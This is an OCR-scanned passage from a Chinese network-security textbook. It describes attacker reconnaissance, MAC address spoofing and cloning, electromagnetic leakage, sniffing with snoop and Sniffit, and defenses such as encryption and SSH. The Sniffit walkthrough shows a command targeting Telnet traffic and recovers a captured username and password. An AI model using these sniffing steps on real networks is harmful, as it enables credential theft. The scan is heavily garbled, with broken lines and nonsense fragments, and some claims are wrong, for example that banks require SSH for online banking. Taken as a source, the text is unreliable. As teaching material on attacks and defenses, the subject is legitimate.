有 敌对 观点 的 宣传 站 点 、 解 雇 了 黑客 的 单位 的 主页 等 。 黑 客 也 可 能 找到 DNS( 域 名 系统 ) 
表 , 通 过 DNS 可 以 知道 计算 机 名 互联 网 地 址 .计算 机 类 型 ,甚至 还 可 知道 计算 机 的 属 主 和 
单位 。 攻 击 目标 还 可 能 来 自 偶然 看 到 的 一 个 调制 解 调 器 的 号 码 或 贴 在 计算 机 旁边 的 使 用 者 
的 名 字 。 

2. 搜集 信息 并 找 出 安全 漏洞 

信息 收集 的 目的 是 为 了 进入 所 要 攻击 的 目标 网 络 的 数据 库 。 下 列 公 开 协 议 或 工具 都 可 
以 用 于 收集 驻 留 在 网 络 系统 中 的 各 个 主机 系统 的 相关 信息 。 

。 SNMP 协议 。 用 来 查阅 网 络 系统 路 由 器 的 路 由 表 , 从 而 了 解 目标 主机 所 在 网 络 的 拓 
扑 结构 及 其 内 部 细节 。 
TraceRoute 程序 。 能 够 用 该 程序 获得 到 达 目 标 主 机 所 要 经 过 的 网 络 数 和 路 由 
器 数 。 
Whois 协议 。 该 协议 的 服务 信息 能 提供 所 有 有 关 的 DNS 域 和 相关 的 管理 参数 。 
DNS 服务 器 。 该 服务 器 提供 了 系统 中 可 以 访问 的 主机 的 IP 地 址 表 和 它们 所 对 应 的 
主机 名 。 
Finger 协议 。 用 来 获取 一 个 指定 主机 上 的 所 有 用 户 的 详细 信息 (如 用 户 注册 名 、 电 
话 号 码 、 最 后 注册 时 间 以 及 他 们 有 没有 读 邮 件 等 ) 。 

。 Ping 实用 程序 。 可 以 用 来 判断 一 个 指定 的 主机 是 否 处 于 open 状态 。 

在 收集 到 攻击 目标 的 一 批 网 络 信息 之 后 ,黑客 会 探测 网 络 上 的 每 台 主 机 ,以 寻求 该 系统 
的 安全 漏洞 或 安全 弱点 ,黑客 可 能 使 用 下 列 方式 自动 扫描 驻 留 在 网 络 上 的 主机 : 


2.1 被 动 攻击 
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。 自 编程 序 。 对 于 某 些 产品 或 者 系统 ,已 经 发 现 了 一 些 安全 漏洞 ,该 产品 或 系统 的 厂 
商 或 组 织 会 提供 一 些 “ 补 丁 ” 程 序 给 予 弥 补 。 但 是 用 户 并 不 一 etd e 
丁 ” 程 序 。 黑 客 发 现 这 些 “ 补 丁 ” 程 序 的 接口 后 会 自己 编写 程序 ,通过 该 接口 进 
标 系统 。 这 时 该 目标 系统 对 于 黑客 来 讲 就 变 得 一 览 无余 了 。 
利用 公开 的 工具 。 像 互联 网 的 电子 安全 扫描 程序 ISS(Internet Security Scanner) 、 
审计 网 络 用 的 安全 分 析 工 具 SATAN (Security Analysis Tool for Auditing 
Network) 等 。 这 样 的 工具 可 以 对 整个 网 络 或 子 网 进行 扫描 ,寻找 安全 漏洞 , 既 可 以 
帮助 系统 管理 员 发 现 其 管理 的 网 络 系统 内 部 隐藏 的 安全 漏洞 ,确定 系统 中 哪些 主机 
需要 用 “补丁 ”程序 去 堵塞 漏洞 ,也 方便 了 黑客 收集 目标 系统 的 信息 ,获取 攻击 目标 
系统 的 非法 访问 权 。 
3. 实施 攻击 
收集 或 探测 到 一 些 * 有 用 ”信息 之 后 ,黑客 可 能 会 对 目标 系统 实施 攻击 。 黑 客 一 旦 获得 
了 对 攻击 的 目标 系统 的 访问 权 后 ,又 可 能 有 下 述 多 种 选择 : 
。 和 毁 掉 攻击 入 侵 的 痕迹 ,并 在 受到 损害 的 系统 上 建立 新 的 安全 漏洞 或 后 门 , 以 便 在 先 
前 的 攻击 点 被 发 现 之 后 继续 访问 这 个 系统 。 
。 在 目标 系统 中 安装 探测 器 软件 ,包括 特洛伊 木马 程序 ,用 来 窒 探 所 在 系统 的 活动 , 收 
集 自己 感 兴趣 的 一 切 信 息 , 如 Telnet 和 FTP 的 账号 名 和 口令 等 。 
。 进一步 发 现 受 损 系统 在 网 络 中 的 信任 等 级 ,这 样 就 可 以 通过 该 系统 信任 级 展开 对 整 
esp 
这 台 受 损 系统 上 获得 了 特许 访问 权 后 ,黑客 可 以 读 取 邮件 ,搜索 和 盗窃 私人 文件 , 毁 
ww wwe 
攻击 一 个 系统 得 手 后 ,黑客 往往 不 会 就 此 黑手 ,他 会 在 系统 中 寻找 相关 主机 的 可 用 信 
息 ,继续 攻击 其 他 系统 。 


2.2 物理 层 和 数据 链 路 层 攻击 技术 


目前 ,大 量 用 户 通过 以 太 网 .无线 局 域 网 或 各 种 基于 PPPoE 的 协议 接 入 Internet ,在 数 
据 链 路 层 均 采 用 以 太 网 的 帧 格式 。 因 此 ,对 数据 链 路 层 的 主要 攻击 方式 为 针对 以 太 网 的 攻 
击 , 方 法 包括 MAC 地 址 欺骗 ,电磁 信息 泄漏 和 网 络 监听 等 。 


2.2.1 MAC 地 址 欺骗 


每 台 连 接 到 以 太 网 上 的 计算 机 都 有 一 个 唯一 的 48 位 以 太 网 地 址 。 以 太 网 卡 厂商 都 从 
一 个 机 构 购 得 一 段 地 址 ,在 生产 时 ,给 每 个 卡 一 个 唯一 的 地 址 。 通 常 ,这 个 地 址 是 固化 在 卡 
上 的 ,又 叫做 物理 地 址 。 当 一 个 数据 帧 到 达 时 ,硬件 会 对 这 些 数据 进行 过 滤 ,根据 帧 结构 中 
的 目的 地 址 ,将 发 送 到 本 设备 的 数据 传输 给 操作 系统 ,忽略 其 他 任何 数据 。 地 址 位 全 为 1 时 
表示 这 个 数据 是 给 总 线 上 所 有 的 设备 的 , 即 为 广播 信息 。 

以 太 网 帧 的 长 度 是 可 变 的 ,但 都 大 于 64B, 小 于 1518B。 在 一 个 包 交 换 网 络 中 ,每 个 以 
太 网 的 帧 包含 一 个 指明 目标 地 址 的 域 。 
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图 2.2 是 以 太 网 帧 的 格式 ,包含 了 目标 和 源 的 物理 地 址 。 


7B 1B 6B _6B 2B 46~1500B 4B 
PA | SFD | DA | SA | LEN/Type Data Pad | FCS 


























PA : 前 同步 码 (10101010 序 列 ， 用 于 使 接收 方 与 发 送 方 同步 ) 
SFD : 帧 首 定 界 (10101011) 
DA : 目的 地 址 (MAC 地 址 ) 
SA : 源 地 址 (MAC 地 址 ) 
LEN (数据 部 分 的 字 节 数 ， 值 为 0~1500B) 
Type: 议 标识 ) 
Data : 数据 (最 少 46B. 最 多 1500B)， 其 中 Pad 为 填充 字段 (保证 帧 长 不 少 于 64B) 
FCS : 帧 校 验 序列 (CRC-32) 



























图 2.2 以太 网 帧 格式 





为 了 识别 目标 和 源 , 帧 的 前 面 是 一 些 前 导 字 节 、 类 型 和 数据 域 以 及 校 验 序列 。 

。 前 同步 码 (PA): 由 64 个 0 和 1 交替 的 位 组 成 ,用 于 接收 同步 。 

。 目 的 地 址 (DA): 指明 接收 方 的 地 址 。 

源 地 址 (SA): 指明 本 机 的 地 址 。 

。 帧 类 型 域 (Type) : 是 一 个 16 位 的 整数 ,用 来 指示 传输 的 数据 的 类 型 。 当 一 个 帧 到 
达 一 台 设 备 后 ,操作 系统 通过 帧 类 型 来 决定 使 用 哪个 软件 模块 ,从 而 允许 在 同一 台 
计算 机 上 同时 运行 多 个 协议 。 

帧 校 验 序列 (FCS) : 32 位 的 CRC 校 验 序列 用 来 检测 传输 错误 。 在 发 送 前 ,将 数据 
用 CRC 进行 运算 ,将 结果 放 在 CRC 域 。 接 收 到 数据 后 ,将 数据 做 CRC 运算 ,比较 
结果 和 CRC 域 中 的 数据 。 如 果 不 一 致 ,那么 传输 过 程 中 有 错误 。 

MAC 地 址 由 12 个 00~~0FFH 的 十 六 进 制 数组 成 ,每 个 十 六 进 制 数 之 间 用 “:“ 隔 开 。 
例如 一 块 网 络 设 备 的 MAC 地 址 为 08: 00: 20: 0A: 8D: 6E, 其 中 前 6 位 十 六 进 制 数 
08:00:20 代表 网 络 硬 件 制造 商 的 编号 , 它 由 IEEE( 电 气 与 电子 工程 师 协会 ) 分 配 , 而 后 3 个 
十 六 进 制 数 0A:8D:6E 代表 该 制造 商 所 制造 的 某 个 网 络 产品 (如 网 卡 ) 的 编号 。 图 2. 3 是 
用 ipconfig /all 命令 列 出 来 的 本 机 MAC 地 址 等 信息 。 


Link 1988 BGN 
-Cg 





图 2.3 MAC 地 址 格式 


以 太 网 卡 的 MAC 地 址 在 系统 初始 化 时 被 读 入 寄存 器 ,发 送 数据 帧 时 自动 作为 源 物理 
地 址 ,在 接收 到 数据 帧 时 同样 自动 比较 该 物理 地 址 与 数据 帧 的 目的 物理 地 址 。 因 此 ,如 果 通 
过 底层 的 1/O 操作 修改 寄存 器 中 的 MAC 地 址 , 即 把 计算 机 的 MAC 地 址 改 为 其 他 被 信任 
的 友好 主机 的 MAC 地 址 ,就 可 以 以 其 友好 主机 的 身份 与 其 他 主机 通信 ,这 就 是 “MAC 地址 
欺骗 ”。 修 改 MAC 地 址 主要 有 两 种 方法 。 
1. 直接 修改 网 卡 MAC 地 址 


MAC 地 址 存储 在 网 卡 的 EEPROM 中 并 且 唯 一 确定 ,但 网 卡 驱动 在 发 送 以 太 网 报 文 
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时 ,并 不 从 EEPROM 中 读 取 MAC 地 址 ,而 是 在 内 存 中 建立 一 块 缓存 区 ,以太 网 报 文 从 中 
读 取 源 MAC 地 址 。 而 且 , 用 户 可 以 通过 操作 系统 修改 实际 发 送 的 以 太 网 报 文中 的 源 MAC 
地 址 。 

打开 “网 上 邻居 ”的 属性 对 话 框 ,选中 对 应 的 网 卡 并 选择 属性 ,在 属性 页 的 “常规 ”页 中 单 
击 “ 配 置 ”按钮 。 在 配置 属性 页 中 选择 “高 级 ”, 再 在 “属性 ” 栏 中 选择 “本 地 管理 的 地 址 ”, 在 
“ 值 ” 栏 中 选中 输入 框 ,然后 在 输入 框 中 输入 正常 接 入 那 台 计算 机 的 MAC 地 址 ,再 设 为 相同 
的 IP 地址 ,就 可 单机 正常 上 网 ,如 图 2.4 所 示 。 但 这 种 方法 只 适合 于 某 台 计算 机 需要 临时 
上 网 的 情况 。 








[ 病 融入 训 | 资源 | 电源 管 理 | 


区 人 Et 在 左边 单 击 您 想 改 去 的 怕 性 ， 然 后 在 











图 2.4 直接 修改 MAC 地 址 


2. 利用 MAC 地 址 克隆 

对 付 MAC 绑 定 最 好 的 办 法 还 是 通过 MAC 地 址 克隆 功能 ,目前 大 多 数 ADSL Modem、 
宽带 路 由 器 .无 线路 由 器 都 具备 此 功能 。 要 实现 MAC 地 址 克隆 功能 很 简单 ,只 需 在 被 绑 定 
的 计算 机 上 进入 宽带 路 由 器 无 线路 由 器 的 Web 设置 页 面 , 找 到 WAN 或 Clone MAC 选 
项 ,选择 Clone MAC( 克 隆 MAC 地 址 ) , 便 可 将 当前 计算 机 的 网 卡 的 MAC 地址 克隆 到 路 由 
器 的 广域网 (WAN) 端 口 。 保 存 后 重新 启动 宽带 路 由 器 、 无 线路 由 器 即 可 正常 地 多 机 共享 上 
网 冲浪 了 。 图 2.5 给 出 一 个 无 线路 由 器 设备 的 MAC 地 址 克隆 界面 。 





本 页 设置 路 由 器 对 广域网 的 HAC 地 址 。 
MAC 地 址 : 54-E6-7C-63-0F-00 ] 国雄 要 中 启 W 




















当前 管理 rctowclt 址 : [D725 -5770 5 ] [RCIE 
注意 : 只 有 局 城中 的 计算 机 能 使 用 “克隆 ” 功能 。 























2.5 MAC 地 址 克隆 


2.2.2 电磁 信息 泄漏 


电磁 信息 泄漏 是 指 电子 设备 的 杂 散 (寄生 ) 电 磁 能 量 通 过 导线 或 空间 向 外 扩散 。 任 何 处 
于 工作 状态 的 电磁 信息 设备 都 存在 不 同 程度 的 电磁 泄漏 。 几 乎 所 有 电磁 泄漏 都 “夹带 ?着 设 
备 所 处 理 的 信息 ,只 是 程度 不 同 而 已 。 在 满足 一 定 条 件 的 前 提 下 ,运用 特定 的 仪器 就 可 以 接 
收 并 根据 数据 链 路 层 的 协议 格式 恢复 出 数据 ,从 而 还 原 这 些 信息 。 


28 网 络 安全 





研究 表明 ,普通 计算 机 CRT 显示 终端 辐射 的 带 信 息 电磁 波 可 以 在 几 百 米 甚 至 一 公里 
外 被 接收 和 复 现 ; 交换 机 、 电 话机 等 泄漏 的 信息 也 可 以 在 一 定 距离 内 通过 特定 手段 截获 和 
还 原 。 电 磁 泄漏 信息 的 接收 和 还 原 技术 目前 已 经 成 为 许多 国家 情报 机 构 用 来 窃取 别 国 重要 
情报 的 手段 。 

当然 ,只 有 强度 和 信 噪 比 满足 一 定 条 件 的 信号 才能 够 被 截获 和 还 原 。 因 此 ,只 要 采取 措 
施 , 弱 化 泄漏 信号 的 强度 , 减 小 泄漏 信号 的 信 噪 比 ,就 可 以 达到 电磁 防护 的 目的 。 常 用 的 电 
磁 防 护 措施 有 屏蔽 滤波、 隔离 .合理 的 接地 与 良好 的 搭 接 . 选 用 低 泄 漏 设备 、 合 理 的 布局 和 
使 用 干扰 器 等 。 


2.2.3 网 络 监听 


网 络 监听 是 指 获 取 在 网 络 上 传输 的 、 并 非 发 给 自己 计算 机 的 信息 。 例 如 ,网 络 管 理 员 可 
以 被 授权 进行 网 络 监听 ,从 而 有 效 地 管理 网 络 ,诊断 网 络 问题 。 当 然 , 更 多 的 网 络 监听 是 在 
非 授权 状态 下 进行 的 。 电 话 可 以 监听 ,无 线 电 通信 可 以 监听 ,网 络 也 同样 可 以 监听 。 

用 户 端的 电话 线路 通常 都 采用 铜 线 , 因 此 电话 监听 最 简单 的 实现 方法 就 是 “ 搭 线 窃听 ”， 
无 线 电 通信 中 要 采用 同 频 的 接收 设备 就 能 收 到 数据 (这 在 军事 领域 已 经 被 充分 使 用 )。 计 算 
机 网 络 的 介质 可 以 是 有 线 的 ( 铜 线 、 同 轴 电 缆 、 光 纤 ) ,也 可 以 是 无 线 电波 ,因此 ,除了 对 光纤 
直接 监听 比较 困难 ,其 他 有 线 ,无线 网 络 环境 中 都 可 以 实施 网 络 监听 。 

在 网 络 上 可 以 找到 的 网 络 监 听 工 具 很 多 , 既 可 以 是 硬件 ,也 可 以 是 软件 。 监 听 工 具 可 以 
设置 在 许多 网 络 节点 上 ,监听 那些 流 经 本 节点 网 络 接口 的 信息 。 通 常 ,监听 效果 最 好 的 地 方 
是 在 网 关 、 路 由 器 、 防 火 墙 等 处 ,因为 流 经 这 些 节点 的 数据 量 大 ,可 获得 的 信息 更 多 。 然 而 ， 
对 以 太 网 的 监听 有 更 为 简捷 的 方式 。 

2.2.3.1 以 太 网 的 工作 机 制 


图 2.6 显示 了 一 个 最 简单 的 以 太 网 拓扑 ,若干 主机 通过 一 个 共享 的 集线器 (hub, 工作 
在 物理 层 的 网 络 设备 ) 构 成 星 形 拓扑 结构 。 以 太 网 基于 总 线 , 物 理 上 以 广播 方式 通信 , 即 一 
台 主 机 发 给 另 一 台 主 机 的 数据 ,集线器 会 先 收 到 ,然后 把 它 再 发 给 所 有 的 其 他 端口 ,因此 , 集 
线 器 下 同一 网 段 的 所 有 主机 的 网 卡 都 能 接收 到 数据 。 








Sniffer 
2.6 Sniffer 的 工作 环境 示意 图 


主机 的 网 卡 收 到 传输 来 的 数据 帧 后 ,网 卡 内 的 固化 程序 先 接收 帧 首部 的 目的 MAC 地 
址 ,判断 是 否 与 自己 的 地 址 相同 : 
。 如 果 相 同 ,就 接收 帧 并 存储 在 网 卡 的 接收 缓冲 区 中 ,然后 产生 中 断 信号 通知 CPU; 
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CPU 得 到 中 断 信 号 后 产生 中 断 ,操作 系统 根据 网 卡 驱 动 程序 设置 的 网 卡 中 断 程序 
地 址 调用 驱动 程序 接收 数据 ; 驱动 程序 接收 数据 后 放 入 TCP/IP 协议 堆栈 ; 操作 系 
统 调用 上 层 协 议 实体 (IP 协议 进程 ) 继 续 处 理 。 
。 如 果 不 同 ,就 丢弃 ,所 以 不 该 接收 的 数据 网 卡 就 截断 了 ,计算 机 根本 就 不 知道 。 
了 解 集线器 和 网 卡 的 基本 工作 原理 后 ,监听 就 比较 容易 实现 了 ,只 要 通知 网 卡 接收 其 收 
到 的 所 有 数据 (这 种 模式 称 为 “混杂 模式 ”, 使 用 Socket API 时 通过 setsockopt 函数 进行 设 
置 ) ,并 通知 主机 进行 处 理 。 如 果 发 现 感 兴趣 的 数据 或 者 符合 预先 设 定 的 过 滤 条 件 的 数据 ， 
可 以 将 其 存 到 log 文件 中 。 
因此 ,监听 以 太 网 很 容易 一 一 只 要 在 任意 一 台 计 算 机 上 运行 一 个 监听 程序 ,并 将 其 网 卡 
设置 为 “混杂 模式 ”, 就 可 以 截获 信息 。 当 然 ,这 仅仅 是 针对 早期 以 太 网 进行 的 监听 。 随 着 交 
换 机 等 分 段 设备 的 出 现 ,这 种 网 络 窃听 变 得 相对 困难 。 
相 比 于 直接 攻击 网 关 、 路 由 器 和 防火 墙 ,网 络 监 听 是 最 简单 的 方式 。 下 面 介绍 的 几 种 常 
用 网 络 监 听 软 件 都 利用 了 以 太 网 的 通信 特点 。 
2.2.3.2 Snoop 监听 工具 
Snoop 可 以 截获 网 络 上 传输 的 数据 包 , 并 显示 其 内 容 , 它 能 方便 地 收集 工作 站 的 信息 ， 
SunOS 和 Solaris 等 操作 系统 中 有 自 带 的 Snoop。Snoop 具备 缓冲 和 过 滤 网 络 通信 的 功能 ， 
截获 的 数据 包 中 的 信息 可 以 实时 显示 ,也 可 以 存储 在 文件 中 , 供 以 后 查看 。 
Snoop 以 单行 输出 数据 包 的 总 结 信息 ,以 多 行 对 包 中 信息 详细 说 明 。 在 总结” 中 ,只 显 
示 最 高 层 协议 的 数据 。 例 如 ,对 于 FTP 数据 包 只 有 FTP 的 信息 显示 ,而 下 层 的 TCP IP 和 
以 太 帧 等 信息 在 总 结 中 不 显示 ,可 以 使 用 -v 参数 将 它们 显示 出 来 。 
下 面 是 使 用 snoop 工具 截获 的 主机 asy8. vineyard. net 和 主机 next 之 间 的 一 段 对 话 : 
# snoop 
asy8. vineyard. net 一 > next SMTP C port = 1974 
asy8. vineyard. net 一 > next SMTP C port = 1974 MAIL FROM: 
<dfddr@vin 
next 一 > asy8. vineyard. net SMTP C port = 1974 250 
< dfddf@vineyard. 
asy8. vineyard. net 一 > next SMTP C port = 1974 
asy8. vineyard. net 一 > next SMTP C port = 1974 RCPT 
TO:vdsalaw@ ix. 
next 一 > asy8.vineyard. net SMTP C port = 1974 250 
< vdsalaw@ ix. netc. 
asy8. vineyard. net 一 > next SMTP C port = 1974. 
asy8. vineyard.net 一 > next SMTP C port = 1974 DATA\r\n. 
next 一 > asy8.vineyard. net SMTP C port = 1974 354 Enter 
mail, end. 
在 这 个 例子 中 ,邮件 消息 在 从 asy8. vineyard. net 到 计算 机 next 的 传输 过 程 中 被 监听 ， 
并 给 出 了 详细 报告 。 
对 于 黑客 来 说 ,最 想 看 到 的 莫 过 于 用 户 的 口令 。 由 于 用 户 的 口令 往往 是 在 一 次 通信 的 
最 初 几 个 数据 包 中 ,并 且 是 明文 形式 ,所 以 只 要 找到 了 两 台 主 机 间 开 始 连接 的 数据 包 , 便 很 
容易 发 现 认 证 用 的 口令 。 
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2.2.3.3 Sniffit 监听 工具 

Sniffit 由 Lawrence Berkeley 实验 室 开发 ,是 运行 于 Solaris、SGI 和 Linux 等 平台 的 一 
种 免费 网 络 监听 软件 ,具有 功能 强大 且 使 用 方便 的 特点 。 用 户 可 以 选择 源 、 目 标 地 址 或 地 址 
集合 以 及 监听 的 端口 .协议 和 网 络 接口 等 。 

Sniffit 的 一 些 命令 行 参数 如 下 : 


-t<IP nr/name> ”检查 发 送 到 < IP> 的 数据 包 
—s<IPnr/name> 检查 从 < IP> 发 出 的 数据 包 


以 上 两 个 参数 都 可 以 用 @ 来 选择 一 个 IP 地 址 范围 ,例如 -t 199. 145. @ 和 -s 199. 14. @。 
一 p<port> 记录 连接 到 < port > 的 数据 包 , port 的 默认 值 是 0, 指 所 有 的 端口 


注意 : -t 或 -s 适用 于 TCP/UDP 数据 包 , 对 ICMP 和 IP 也 进行 解释 ; 而 -p 只 用 于 TCP 
和 UDP 数据 包 。 


-i 交互 模式 ,忽略 其 他 参数 

能 与 除了 -i 之 外 其 他 参数 组 合 使 用 的 命令 行 参数 如 下 : 

3 等 同 于 同时 使 用 了 一 t 和 - sy, 而 不 管 使 用 了 -上 和- s 中 的 哪 一 个 
二 名 以 ASCII 形式 将 监听 到 的 结果 输出 

一 R< char> 在 进行 记录 时 ,所 有 不 可 打印 字符 都 用 < char > 来 代替 

一 P protocol 要 检查 的 协议 ,默认 为 TCP, 可 选 IPTCP ICMP UDP 及 其 组 合 


下 面 是 运行 Sniffit 的 一 个 例子 ,首先 设置 人 口 参数 : 

ifft = -A -p23 =t11.22,33.@ 

其 中 ,-a 指 接 收 所 有 信息 ; -A 将 不 可 打印 的 字符 用 “. "代替 ; -p 表示 监听 端口 23; -t 表 
示 目 标 地 址 在 11. 22. 33. 子 网 范围 (可 以 只 监听 一 台 主 机 或 源 主机 )。 使 用 -s 参数 可 以 指定 
监听 的 源 主机 。 下 面 是 监听 到 的 部 分 结果 : 


Packet ID (form_IP. port ~ to_IP. port) :11.22.33.41.1028 - 11.22.33.14.23 

B06 hr le pnti00 

监听 结果 中 出 现 了 vt100, 说 明 这 很 可 能 是 使 用 Telnet 服务 时 源 主机 与 目标 主机 进行 
终端 类 型 协商 阶段 。 源 主机 告诉 目标 主机 自己 使 用 的 终端 类 型 ,将 开始 远程 终端 服务 。 后 
面 很 可 能 会 传输 用 户 登 录 名 和 口令 字 。 这 里 使 用 1028 端口 的 是 客户 端 ,使 用 23 端口 的 是 
服务 器 端 。 继 续 看 下 面 的 内 容 : 


Packet ID (form IP. port - to_IP. port) :11. 22.33. 41.1028 - 11.22.33.14.23 


.+5.@. | 22 i 

Packet ID (form_IP. port - to_IP. port) :11. 22.33.41.1028 - 11.22.33.14.23 
Bs 十 是: 国 i i 

Packet ID (form_IP. port - to_IP. port) :11. 22.33.41.1028— 11.22.33.14.23 
J 8 de i 

Packet ID (form IP. port - to_IP. port):11.22.33.41.1028— 11.22.33.14.23 
| ERS. K.2JP.!..... 


Packet ID (form IP.port— to_IP.port) :11.22.33.41.1028 一 11.22.33.14.23 
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Re | | 

Packet ID (form IP. port - to_IP. port) :11.22.33.41.1028— 11.22.33.14.23 
E..)<.@. 
Packet ID (form IP. port - to_IP. port) :11.22.33.41.1028— 11.22.33.14.23 
Bt ON EL 

Packet ID (form_IP. port - to_IP. port) :11. 22.33.41.1028— 11.22.33.14.23 
We od | 

Packet ID (form_IP. port - to_IP. port) :11.22.33.41.1028— 11.22.33.14.23 
EP | 2 


客户 端 向 服务 器 端 发 送出 了 几 个 包 , 其 中 的 可 打印 字符 连 起 来 是 lxg, 很 可 能 是 用 户 
名 。 继 续 看 下 面 的 内 容 : 


Packet ID (form_IP. port - to_IP. port):11.22.33.41.1028— 11.22.33.14.23 
到 Ca 时 
Packet ID (form_IP. port - to_IP. port):11.22.33.41.1028— 11.22.33.14.23 
E..)D.@. ...... Ws 
Packet ID (form IP. port - to_IP. port):11.22.33.41.1028— 11.22.33.14.23 
| 机 下 

Packet ID (form_IP. port - to_IP. port):11.22.33.41.1028— 11.22.33.14.23 
Ei 可 
Packet ID (form_IP 





4 











.22.33.41.1028— 11.22.33.14.23 





EE ey 1. 
Packet ID (form_IP. port ~ to_IP. port .22.33.41.1028— 11.22.33.14.23 
Bs rss i 


Packet ID (form_IP. port - to_IP. port) :11. 22.33.41.1028— 11.22.33.14.23 
E..)H.@. ...... i 

Packet ID (form_IP. port - to_IP. port) :11. 22.33.41.1028— 11.22.33.14.23 
EE ee ' 


这 一 串 可 打印 字符 连 起 来 是 721216 ,应 该 是 用 户 的 口令 。 





Packet ID (form_IP. port ~ to_IP. port):11.22.33.41.1028— 11.22.33.14.23 
E..)M.@. wl 

Packet ID (form_IP. port - to_IP. port):11.22.33.41.1028— 11.22.33.14.23 
E..)N.@. ...... Ws 
Packet ID (form_IP. port - to_IP. port):11.22.33.41.1028— 11.22.33.14.23 
| i EK BD 

Packet ID (form_IP. port ~ to_IP. port):11.22.33.41.1028— 11.22.33.14.23 
村] 四， !. 
Packet ID (form_IP. port ~ to_IP. port):11.22.33.41.1028— 11.22.33.14.23 











A PO Sy 
Packet ID (form_IP. port - to_IP. port) :11.22.33.41.1028— 11.22.33.14.23 
i SEO 1 


Packet ID (form IP.port - to_IP. port) :11.22.33.41.1028— 11.22.33.14.23 

ES ls 

这 个 用 户 执 行 了 exit 命令 。 

综 上 所 述 , 得 到 的 有 效 信息 是 : vt100、1xg、721216 和 exit。 

Sniffit 可 以 产生 这 样 的 综合 信息 ,并 且 在 本 目录 下 生成 一 个 类 似 于 xxx. xxx. xxx。 
xxx. mm-yyy. yyy. yyy. yyy. nn 为 文件 名 的 文件 。 其 中 , xxx. xxx. xxx. xxx 和 yyy. yyy. 
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yyy. yyy 是 通信 双方 的 IP 地址 ,mm 和 nn 是 通信 双方 的 端口 号 。 

当然 ,网 络 监听 软件 还 有 很 多 ,有 兴趣 的 读者 可 以 查阅 有 关 书 籍 ,也 可 以 自己 用 Socket 
写 一 段 代码 来 实现 。 

2.2.3.4 Sniffer 监听 工具 


Sniffer 的 含义 为 “ 嗅 探 器 ” ,可 以 形象 地 理解 为 打 入 到 敌人 内 部 的 特工 ,源源 不 断 地 将 
敌 方 的 情报 送出 来 。Sniffer 几乎 能 得 到 以 太 网 上 传送 的 任何 数据 包 。 现 在 已 经 有 多 种 运 
行 于 不 同 平台 上 的 Sniffer 程序 ,如 Linux tcpdump、The Gobbler、 LanPatrol、LanWatch、 
Netmon、Netwatch、Netzhack 等 。Sniffer 程序 通常 运行 在 路 由 器 或 有 路 由 器 功能 的 主机 
上 ,以 便 监控 大 量 数据 。 通 常 攻击 者 先 侵入 目标 网 络 ,在 其 中 某 主机 上 留 下 后 门 并 安装 
Sniffer 工具 ,然后 运行 Sniffer 程序 ,除了 能 得 到 用 户 名 、 口 令 , 还 能 得 到 登录 用 户 的 银行 卡 
号 ,公司 账号 .网 上 传送 的 金融 信息 等 。 

通常 Sniffer 程序 根据 数据 包 的 前 200 一 300 个 字 节 数据 就 能 发 现 用 户 名 和 口令 等 信 
息 。 图 2.7 是 Sniffer 截取 到 的 一 个 数据 包 , 选 中 的 数据 是 用 户 向 某 网 站 发 送 的 www http 
请 求 (目的 端口 是 80)。 从 中 可 以 看 到 发 送 、 接 收 方 的 网 卡 地 址 、IP 地 址 、TCP 的 端口 以 及 
部 分 数据 。 如 果 这 是 用 户 登录 到 某 银行 网 站 的 请 求 ,那么 从 TCP 数据 中 分 析出 其 用 户 名 、 
口令 很 容易 。 


Destination Protocol Info 





图 2.7 Sniffer 截取 的 部 分 数据 


在 网 络 上 想 发 现存 在 着 Sniffer 程序 非常 困难 ,因为 它 没有 在 网 络 中 留 下 任何 痕迹 , 通 
过 查看 本 地 计算 机 上 的 进程 , 才 可 能 找到 一 些 蛛丝马迹 。 

如 果 主 机 运行 在 UNIX 系统 下 ,可 以 使 用 ps 命令 列 出 当前 的 所 有 进程 .启动 这 些 进程 
的 用 户 .占用 CPU 的 时 间 ,占用 的 内 存 等 。 例 如 : 


ps -aux 或 ps -augx 


如 果 主 机 运行 在 Windows 系统 下 ,可 以 同时 按 下 Ctrl 十 Alt 十 Del 键 查看 任务 列表 。 不 
过 ,编程 技巧 高 的 Sniffer 即使 正在 运行 ,也 不 会 在 这 里 出 现 。 

附录 A 给 出 一 个 简单 的 Sniffer 源 代码 。 

2.2.3.5 防止 网 络 监听 


防止 各 种 监听 程序 对 网 络 的 监听 也 有 多 种 方法 ,如 加 密 传输 、 采 用 安全 拓扑 结构 等 ,但 
系统 开销 会 比较 大 。 

加 密 是 对 付 网 络 监听 比较 好 的 方法 , 即 在 传送 前 加 密 数 据 , 对 方 收 到 后 解密 。 这 样 , 即 
使 监听 到 加 密 后 的 数据 ,也 不 得 不 花费 相当 代价 去 解密 (很 多 时 候 ,解密 的 开销 甚至 高 过 这 
些 数据 信息 本 身 的 价值 ) 。 

遗憾 的 是 传统 TCP/IP 协议 假定 所 有 用 户 都 是 “君子 ”, 为 了 提高 传输 的 效率 ,都 采用 明 
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文 传输 而 没有 加 密 。 因 此 ,让 网 络 监听 失效 的 最 根本 方法 是 增强 TCP/IP 协议 ,例如 ,在 
IPv6 协议 中 就 提供 了 内 置 的 IPSec 可 选 报头 ,可 以 以 密 文 的 方式 传输 数据 ; 而 对 于 当前 以 
IPv4 为 主 的 网 络 , 则 基本 采用 * 打 补丁 ”的 方法 ,例如 ,在 各 个 银行 的 网 站 上 ,都 要 求 所 有 进 
入 其 网 银 的 用 户 采 用 SSH(Secure Shell, 安 全 ShelD) 协 议 或 者 F-SSH 协议 。 

SSH 是 在 应 用 程序 中 提供 安全 通信 的 协议 ,建立 在 客户 机 /服务 器 模型 上 ,服务 器 的 服 
务 端口 是 TCP 的 22 号 端口 。SSH 实现 了 一 个 密 钥 交换 协议 以 及 主机 与 客户 端的 认证 协 
议 ,提供 互联 网 上 的 安全 加 密 通信 方式 和 在 不 安全 信道 上 很 强 的 认证 和 安全 通信 功能 。 当 
服务 器 端 与 客户 端 建立 连接 时 ,采用 基于 公 钥 的 RSA 算法 对 用 户 进 行 身 份 认证 ; 而 在 认证 
完成 后 ,具体 的 数据 通信 采用 基于 单 钥 的 IDEA 算法 加 密 , 单 钥 算 法 运行 速度 快 ,更 适合 数 
据 通 信 。 作 为 工具 使 用 的 SSH 允许 用 户 安全 登录 到 远程 主机 上 执行 命令 或 传输 文件 。 它 
可 以 作为 rlogin、rsh、rcp 和 rdist 等 系统 程序 的 替代 ,运行 在 任何 使 用 TCP 协议 的 主机 上 。 

1996 年 ,SSH 成 立 了 数据 流 联盟 F-SSH ,提供 高 水 平 的 .可 用 于 军 方 级 别 的 通信 加 密 
